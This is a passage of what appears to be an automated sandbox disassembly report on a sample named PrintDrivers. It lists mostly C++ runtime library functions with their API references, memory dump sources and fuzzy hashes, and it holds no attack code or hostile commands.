                                                                    • API String ID: 49843589-0
                                                                    • Opcode ID: bba57d724eb5f18ea2f785c243925165819606304b55ed180215ce5ed1ec0c50
                                                                    • Instruction ID: 44c87f162d73ff2845a307b5b5b014524a8c0b829dc61d7066c20771aa183e99
                                                                    • Opcode Fuzzy Hash: bba57d724eb5f18ea2f785c243925165819606304b55ed180215ce5ed1ec0c50
                                                                    • Instruction Fuzzy Hash: DDA1A275A01249DFDB14EFA8C894AADBBF5FF88310F28462DE816E7390E7319905CB50
                                                                    Function 005A1F88 Relevance: 6.3, APIs: 4, Instructions: 287COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A1F8F
                                                                    • collate.LIBCPMT ref: 005A1F98
                                                                      • Part of subcall function 005A0CC4: __EH_prolog3_GS.LIBCMT ref: 005A0CCB
                                                                      • Part of subcall function 005A0CC4: __Getcoll.LIBCPMT ref: 005A0D2F
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • __Getcoll.LIBCPMT ref: 005A1FDE
                                                                    • numpunct.LIBCPMT ref: 005A2236
                                                                      • Part of subcall function 00586010: LocalAlloc.KERNEL32(00000040,?,005943F0,00000020,?,?,005890A2,00000000,F3F544E4,?,?,?,?,005C6D1D,000000FF), ref: 00586016
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                    • String ID:
                                                                    • API String ID: 259100098-0
                                                                    • Opcode ID: 0060fd8b92d9b5eb16950f1eff392cbd22a762f849016e7c8ed47f504782b324
                                                                    • Instruction ID: 763ced653801617a5b06e3adf1669ce4288cce2cb6f21c9007ef3f24cc334f85
                                                                    • Opcode Fuzzy Hash: 0060fd8b92d9b5eb16950f1eff392cbd22a762f849016e7c8ed47f504782b324
                                                                    • Instruction Fuzzy Hash: 359193B1904216AAD7247BB54C4EB7F7EE8FF82760F104518F849A7282EEB54D0097E2
                                                                    Function 005A7E5C Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 4c4b8c1588820e882a2abdf46f1c95cbfb8934ac3d921302c485e2fe692526cb
                                                                    • Instruction ID: 071d3865bc65afff1aeb0f419b07f2ba0f410c2c92276f53453c333e86c35a16
                                                                    • Opcode Fuzzy Hash: 4c4b8c1588820e882a2abdf46f1c95cbfb8934ac3d921302c485e2fe692526cb
                                                                    • Instruction Fuzzy Hash: 6751E87260820AAFDB258F20CC45BBE7FA4FF5A310F24456DE80597291E731EE80D790
                                                                    Function 0058B080 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 167memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000018,F3F544E4,?,00000000), ref: 0058B0E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AllocLocal
                                                                    • String ID: false$iw]$true
                                                                    • API String ID: 3494564517-1778967338
                                                                    • Opcode ID: 5c01ab794ba2f60a1df90dbc5bf386c470f733e5cb3da05351655678ef9852f6
                                                                    • Instruction ID: 54af88da64caa70438d21007fbd6563db91925496bcb195f6c31cc2ef7c38a0f
                                                                    • Opcode Fuzzy Hash: 5c01ab794ba2f60a1df90dbc5bf386c470f733e5cb3da05351655678ef9852f6
                                                                    • Instruction Fuzzy Hash: 1F6181B1D00709DBDB20DFA4C845B9EBBB8FF18704F10426EE855A7281E771AA44CF91
                                                                    Function 005875F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 126memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,?,?,F3F544E4,?,?,?,?,005C6160,000000FF,?,0058745D), ref: 00587671
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,?,?,F3F544E4,?,?,?,?,005C6160,000000FF,?,0058745D), ref: 00587691
                                                                      • Part of subcall function 00582B10: LocalAlloc.KERNEL32(00000040,005DD827,005DD804,005DD804), ref: 00582B49
                                                                    • LocalFree.KERNEL32(]tX,000000FF,?,0058745D,?,?,00000000,00000000,?,F3F544E4,F3F544E4,?), ref: 0058770C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free
                                                                    • String ID: ]tX
                                                                    • API String ID: 209276640-3049652677
                                                                    • Opcode ID: ba8eabf1a33607b39bfa4a4f669de3e91ccd8b9140a5bf1443737b4963217545
                                                                    • Instruction ID: 201b24f01dad9153a9ef62678d2a4bf6ad5b466b2ce4d751fd150fd2ad83d165
                                                                    • Opcode Fuzzy Hash: ba8eabf1a33607b39bfa4a4f669de3e91ccd8b9140a5bf1443737b4963217545
                                                                    • Instruction Fuzzy Hash: A341E63250821A8FD714AF29DC8596E7BD9FB89350F240A7AF926E7261EB70DC04C791
                                                                    Function 005B33A9 Relevance: 6.1, APIs: 4, Instructions: 83COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e95341a83b4e53407d8d0665afd96cece6fbfb3644e041f024d83766ea567d29
                                                                    • Instruction ID: 9dcfc48d81f070701f6ad672886800c7415318bbed8925b56a52bd9e1c415f51
                                                                    • Opcode Fuzzy Hash: e95341a83b4e53407d8d0665afd96cece6fbfb3644e041f024d83766ea567d29
                                                                    • Instruction Fuzzy Hash: FA21D471604616AFDF22AF658C89DAB7FACFF413647108A65F929E7251DB30FE008760
                                                                    Function 005B664C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00000008,005BB99E,00594425,0059446B), ref: 005B6651
                                                                    • _free.LIBCMT ref: 005B66AE
                                                                    • _free.LIBCMT ref: 005B66E4
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 005B66EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 8bc7ab04e283765d20ad660f629d18e6155e918914e1e06eccdf1346348f91e4
                                                                    • Instruction ID: 2329d7f51f095ecd5c0d3b0a9f36af12fa3239cc0de9afb9637daa8ea2cfe4f1
                                                                    • Opcode Fuzzy Hash: 8bc7ab04e283765d20ad660f629d18e6155e918914e1e06eccdf1346348f91e4
                                                                    • Instruction Fuzzy Hash: B2110A362005037ED6212AB45C8EEFA2F5DBFE1775B380636F526821D2EE69AC049351
                                                                    Function 00592AF7 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00592AFE
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00592B08
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00592BAC
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00592BB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                    • String ID:
                                                                    • API String ID: 4244582100-0
                                                                    • Opcode ID: cd180f0c0f185516a953f402f9cf1823a3ea9704ad17ca55085a19f9a222b5c3
                                                                    • Instruction ID: ee3b9010c462134ab9ce91c8e66f8ebcfa02e1f551e2351a7c3b3559882d1c75
                                                                    • Opcode Fuzzy Hash: cd180f0c0f185516a953f402f9cf1823a3ea9704ad17ca55085a19f9a222b5c3
                                                                    • Instruction Fuzzy Hash: D4211935A0061AAFCB04EF14C895EADBBA1FF49310F018959E9669B7A1CF70ED50CF80
                                                                    Function 005B67A3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,?,005A93A9,00000000,?,005A9421,00000000,00000000,00000000,00000000,00000000,?,00582DBF,F3F544E4), ref: 005B67A8
                                                                    • _free.LIBCMT ref: 005B6805
                                                                    • _free.LIBCMT ref: 005B683B
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,005A93A9,00000000,?,005A9421,00000000,00000000,00000000,00000000,00000000), ref: 005B6846
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 3ad52ed7755d382160a2f3ae86066cb206c60392ecf3ce6770f25ffaed45fb1e
                                                                    • Instruction ID: 7983dd6d35ab4b0742aafc5d60a0240e859608a8dc9bb6a153423f6bdbd0aad0
                                                                    • Opcode Fuzzy Hash: 3ad52ed7755d382160a2f3ae86066cb206c60392ecf3ce6770f25ffaed45fb1e
                                                                    • Instruction Fuzzy Hash: 04110C71201503BAD6202A745CCEEFA2E9DFFD1B757380636F116931D2EE29AC08A350
                                                                    Function 00590370 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,F3F544E4), ref: 005903AC
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 005903CC
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 005903FD
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00590416
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                    • String ID:
                                                                    • API String ID: 3604237281-0
                                                                    • Opcode ID: b4bc57873f4cb38c35865a96d01f33460ff1e4fdcd04ba925378b7e3eac904e8
                                                                    • Instruction ID: 4be2e867c4eb4dcf156c5a66bd287437624fff64a6b28475a169d5690fa28784
                                                                    • Opcode Fuzzy Hash: b4bc57873f4cb38c35865a96d01f33460ff1e4fdcd04ba925378b7e3eac904e8
                                                                    • Instruction Fuzzy Hash: 20218171941619EFDB20CF54DC4AF9EBBB8FB05B24F10425AF511B72C0D7B46A058BA4
                                                                    Function 005960D4 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005960DB
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005960E5
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596136
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596156
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 96218065a6891051ea417ec0f1fa0946514f7104f49721d7ce41ad9b44641041
                                                                    • Instruction ID: 1dca0ee78f8c13b78abbef9c53b78ade505e907ab4f23b01562af69317e65213
                                                                    • Opcode Fuzzy Hash: 96218065a6891051ea417ec0f1fa0946514f7104f49721d7ce41ad9b44641041
                                                                    • Instruction Fuzzy Hash: 0C01613590421A9BCF05FBA4C849ABE7FA1FF84710F254509E4156B391DF709E4ADB81
                                                                    Function 00596169 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596170
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059617A
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005961CB
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005961EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 7f21f9823649a015580ad8835f083a93e67c3988974dd794533733ae570adc34
                                                                    • Instruction ID: dd8e222986d37b140c379b3b6c3a1d3066c6339acf38d37e8620230416357542
                                                                    • Opcode Fuzzy Hash: 7f21f9823649a015580ad8835f083a93e67c3988974dd794533733ae570adc34
                                                                    • Instruction Fuzzy Hash: 9D01A1359002168BCF05EBA48849ABE7FB1FFC4320F650549F8106B292DF70DE49DB90
                                                                    Function 005961FE Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596205
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059620F
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596260
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596280
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 041b3df2052e1853f3aa944db2ff24b958127e45a0add73b42b8914e3456c69c
                                                                    • Instruction ID: 454e4fa6f33b1de6af39bde509e6b3be164f1fda45bae12013544bdc1b418a60
                                                                    • Opcode Fuzzy Hash: 041b3df2052e1853f3aa944db2ff24b958127e45a0add73b42b8914e3456c69c
                                                                    • Instruction Fuzzy Hash: 9B016D3990461A9BCF05EBA4C849ABE7FB1FF84310F254509F851AB291DF749E0ACB81
                                                                    Function 00596293 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059629A
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005962A4
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005962F5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596315
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 169d77bb4d2c84cfd8a2859e642a7edd831f0afac4bd179659d9132f980d99eb
                                                                    • Instruction ID: d7211f44498900cb6b839a62ed677caa87d25fd5e6cd6dc1a72d04dc8c03b52e
                                                                    • Opcode Fuzzy Hash: 169d77bb4d2c84cfd8a2859e642a7edd831f0afac4bd179659d9132f980d99eb
                                                                    • Instruction Fuzzy Hash: 8D01C03590051A8BCF09EBA4C859ABE7FA1FFC4310F654549F811AB291DF709E49DB90
                                                                    Function 0059657C Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596583
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059658D
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005965DE
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005965FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 8a9d334aaf0c4d4c3204735f4b510f54eac65bf41d1263729fb635991fab3603
                                                                    • Instruction ID: d0308cf5d777b882fb62fa3c6fa693084d7d91e14516b073767ee29887e96e76
                                                                    • Opcode Fuzzy Hash: 8a9d334aaf0c4d4c3204735f4b510f54eac65bf41d1263729fb635991fab3603
                                                                    • Instruction Fuzzy Hash: B801AD3590012B8BCF05EBA4C959ABE7FB1FFC4320F650508E851AB291DF709E0A8B80
                                                                    Function 00596611 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596618
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596622
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596673
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596693
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 18149e937a272fc7aa3c568f60a0a2c69c728d6971d359fce883864cb35511ad
                                                                    • Instruction ID: 63ef3935d06fc172b663bedde554d3fefdbf7536064b61682d5dd04ee638621a
                                                                    • Opcode Fuzzy Hash: 18149e937a272fc7aa3c568f60a0a2c69c728d6971d359fce883864cb35511ad
                                                                    • Instruction Fuzzy Hash: EA016135900216DBCF05EBA4C859ABE7FB1FFC4310F240509E8656B291DF749E498B91
                                                                    Function 0059673B Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596742
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059674C
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059679D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005967BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
